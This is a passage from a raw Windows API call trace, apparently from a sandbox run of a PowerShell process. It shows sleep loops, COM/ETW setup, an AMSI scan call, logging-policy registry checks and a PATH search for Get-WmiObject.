(dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.359] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.405] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.784] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.917] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.015] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.095] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.213] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.362] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.452] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.547] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.906] SleepEx (dwMilliseconds=0x0, bAlertable=0) Thread: id = 88 os_tid = 0x1130 Thread: id = 92 os_tid = 0x53c Thread: id = 188 os_tid = 0x900 [0139.419] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0139.419] CoGetContextToken (in: pToken=0x798f4fc | out: pToken=0x798f4fc) returned 0x0 [0139.419] CObjectContext::QueryInterface () returned 0x0 [0139.419] CObjectContext::GetCurrentThreadType () returned 0x0 [0139.419] Release () returned 0x0 [0139.419] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0139.419] CoUninitialize () [0139.419] RoInitialize () returned 0x1 [0139.419] RoUninitialize () returned 0x0 [0188.961] CoGetContextToken (in: pToken=0x798f2ac | out: pToken=0x798f2ac) returned 0x0 [0188.961] IUnknown:QueryInterface (in: This=0x12f9f70, riid=0x73b35e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x798f2d0 | out: ppvObject=0x798f2d0*=0x12f9f7c) returned 0x0 [0188.962] IComThreadingInfo:GetCurrentThreadType (in: This=0x12f9f7c, pThreadType=0x798f2fc | out: pThreadType=0x798f2fc*=0) returned 0x0 [0188.962] IUnknown:Release (This=0x12f9f7c) returned 0x1 [0188.976] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 189 os_tid = 0xa50 [0139.421] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0139.421] RoInitialize () returned 0x1 [0139.421] RoUninitialize () returned 0x0 [0139.423] GetCurrentProcessId () returned 0x514 [0139.425] EtwEventWriteTransfer (RegHandle=0x12c9d48, EventDescriptor=0x2e, ActivityId=0x7a0f24c, RelatedActivityId=0x7a0f1fc, UserDataCount=0x0, UserData=0x8) returned 0x0 [0139.425] EtwEventWriteTransfer (RegHandle=0x12c9d48, EventDescriptor=0x2e, ActivityId=0x7a0f278, RelatedActivityId=0x7a0f228, UserDataCount=0x0, UserData=0x2) returned 0x0 [0139.428] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x660 [0139.433] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Threading.OverlappedData_Disabled", lpBuffer=0x7a0e9ac, nSize=0x80 | out: lpBuffer="က牝\x01") returned 0x0 [0139.433] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Threading.OverlappedData_MinCount", lpBuffer=0x7a0e9ac, nSize=0x80 | out: lpBuffer="က牝\x01") returned 0x0 [0139.436] EtwEventRegister (in: ProviderId=0x519ac3c, EnableCallback=0x7252cf6, CallbackContext=0x0, RegHandle=0x519ac18 | out: RegHandle=0x519ac18) returned 0x0 [0139.436] EtwEventSetInformation (RegHandle=0x76235b0, InformationClass=0x50, EventInformation=0x2, InformationLength=0x519abe0) returned 0x0 [0139.439] ConnectNamedPipe (in: hNamedPipe=0x650, lpOverlapped=0x519ae24 | out: lpOverlapped=0x519ae24) returned 0 Thread: id = 206 os_tid = 0x12f4 Thread: id = 210 os_tid = 0x38c Thread: id = 219 os_tid = 0x7b8 [0153.819] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0153.972] RoInitialize () returned 0x1 [0153.973] RoUninitialize () returned 0x0 [0153.974] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x86df1dc*=0x6fc, lpdwindex=0x86deffc | out: lpdwindex=0x86deffc) returned 0x0 [0154.700] SetThreadUILanguage (LangId=0x0) returned 0xf00409 [0154.956] EtwEventRegister (in: ProviderId=0x530ebf0, EnableCallback=0x7252e06, CallbackContext=0x0, RegHandle=0x530ebcc | out: RegHandle=0x530ebcc) returned 0x0 [0154.956] EtwEventSetInformation (RegHandle=0x7623ef8, InformationClass=0x59, EventInformation=0x2, InformationLength=0x530eba4) returned 0x0 [0155.649] CoCreateGuid (in: pguid=0x86df048 | out: pguid=0x86df048*(Data1=0x5571ab40, Data2=0xc2fb, Data3=0x4583, Data4=([0]=0xbc, [1]=0xd2, [2]=0xd6, [3]=0x63, [4]=0x1a, [5]=0x57, [6]=0x2b, [7]=0x61))) returned 0x0 [0155.676] QueryPerformanceCounter (in: lpPerformanceCount=0x86df028 | out: lpPerformanceCount=0x86df028*=25143190486) returned 1 [0155.679] AmsiOpenSession () returned 0x0 [0155.679] AmsiScanString () returned 0x80070015 [0156.473] CoCreateGuid (in: pguid=0x86de4d8 | out: pguid=0x86de4d8*(Data1=0x71ea9aea, Data2=0x2432, Data3=0x4715, Data4=([0]=0x82, [1]=0xde, [2]=0xa4, [3]=0x6a, [4]=0xfe, [5]=0x28, [6]=0xa1, [7]=0x35))) returned 0x0 [0158.043] QueryPerformanceCounter (in: lpPerformanceCount=0x86deff0 | out: lpPerformanceCount=0x86deff0*=25379861560) returned 1 [0158.094] EtwEventRegister (in: ProviderId=0x531fd44, EnableCallback=0x7252f3e, CallbackContext=0x0, RegHandle=0x531fd20 | out: RegHandle=0x531fd20) returned 0x0 [0158.094] EtwEventSetInformation (RegHandle=0x7623178, InformationClass=0x63, EventInformation=0x2, InformationLength=0x531fcf0) returned 0x0 [0158.095] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x86dee60, nSize=0x80 | out: lpBuffer="劆ꀡက永스汃\x01耀哔玪勂ꀡ\x02") returned 0x0 [0158.387] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x86df0b8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86df0b8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x2e, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0158.387] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86df024*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86df024*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0158.387] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86df0a8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x2e, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86df0a8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x2e, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0158.395] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x86df0b8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86df0b8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x2f, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0158.395] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86df024*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86df024*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x2e, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0158.395] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86df0a8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x2f, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86df0a8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x2f, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0158.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x86de674, nSize=0x80 | out: lpBuffer="娚ꀡက永က永") returned 0x0 [0158.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x86de674, nSize=0x80 | out: lpBuffer="娚ꀡက永က永") returned 0x0 [0158.653] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x86de660, nSize=0x80 | out: lpBuffer="က永က永") returned 0x0 [0158.675] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x86deecc | out: phkResult=0x86deecc*=0x0) returned 0x2 [0158.676] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x86deecc | out: phkResult=0x86deecc*=0x0) returned 0x2 [0158.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x86de630, nSize=0x80 | out: lpBuffer="က永က永") returned 0x0 [0158.822] CoCreateGuid (in: pguid=0x86dede8 | out: pguid=0x86dede8*(Data1=0x1d0f2495, Data2=0xd3f9, Data3=0x442c, Data4=([0]=0xaa, [1]=0x37, [2]=0x5f, [3]=0x27, [4]=0xff, [5]=0x99, [6]=0x4, [7]=0x8e))) returned 0x0 [0158.837] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x86dea68, nSize=0x80 | out: lpBuffer="֠琎࡭ភ玨") returned 0x0 [0158.841] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x86de984, nSize=0x80 | out: lpBuffer="") returned 0xbc [0158.841] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x86de90c, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0158.844] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x86de8f8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0158.918] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x133ac60 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0158.923] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x86de900, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0158.925] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x104, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0158.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea38) returned 1 [0158.925] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x86deab4 | out: lpFileInformation=0x86deab4*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0158.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea34) returned 1 [0158.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deab4) returned 1 [0158.927] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0158.927] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0158.928] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Get-WmiObject.*", lpFindFileData=0x86de7dc | out: lpFindFileData=0x86de7dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0158.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea54) returned 1 [0158.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea60) returned 1 [0158.932] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x86de190, nSize=0xbc | out: lpBuffer="抈琎") returned 0x0 [0158.932] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0158.932] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0158.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea38) returned 1 [0158.932] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x86deab4 | out: lpFileInformation=0x86deab4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0158.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea34) returned 1 [0158.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deab4) returned 1 [0158.932] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0158.932] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0158.932] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\Get-WmiObject.*", lpFindFileData=0x86de7dc | out: lpFindFileData=0x86de7dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0158.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea54) returned 1 [0158.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea60) returned 1 [0158.933] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0158.933] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0158.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea38) returned 1 [0158.933] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x86deab4 | out: lpFileInformation=0x86deab4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x8a09b964, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x8a09b964, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0158.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea34) returned 1 [0158.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deab4) returned 1 [0158.934] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0158.934] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0158.934] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\Get-WmiObject.*", lpFindFileData=0x86de7dc | out: lpFindFileData=0x86de7dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0158.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea54) returned 1 [0158.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea60) returned 1 [0158.934] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0158.934] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0158.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea38) returned 1 [0158.934] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x86deab4 | out: lpFileInformation=0x86deab4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0158.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea34) returned 1 [0158.935] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deab4) returned 1 [0158.935] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0158.935] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0158.935] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\Get-WmiObject.*", lpFindFileData=0x86de7dc | out: lpFindFileData=0x86de7dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0158.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea54) returned 1 [0158.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea60) returned 1 [0158.935] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0158.935] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0158.935] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea38) returned 1 [0158.935] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x86deab4 | out: lpFileInformation=0x86deab4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x172cbef, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8cfff4c6, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0158.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea34) returned 1 [0158.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deab4) returned 1 [0158.936] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0158.936] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0158.936] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\Get-WmiObject.*", lpFindFileData=0x86de7dc | out: lpFindFileData=0x86de7dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0158.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea54) returned 1 [0158.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea60) returned 1 [0158.936] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x34 [0158.936] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x34, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", lpFilePart=0x0) returned 0x33 [0158.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea38) returned 1 [0158.936] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windowsapps"), fInfoLevelId=0x0, lpFileInformation=0x86deab4 | out: lpFileInformation=0x86deab4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc88fb23e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0158.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea34) returned 1 [0158.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deab4) returned 1 [0158.936] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x34 [0158.937] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x34, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps", lpFilePart=0x0) returned 0x33 [0158.937] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps\\Get-WmiObject.*", lpFindFileData=0x86de7dc | out: lpFindFileData=0x86de7dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0158.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea54) returned 1 [0158.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea60) returned 1 [0158.940] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x86de964, nSize=0xbc | out: lpBuffer="") returned 0xc3 [0158.940] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x86de954, nSize=0xc3 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0xc2 [0158.947] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0159.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deae4) returned 1 [0159.010] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", 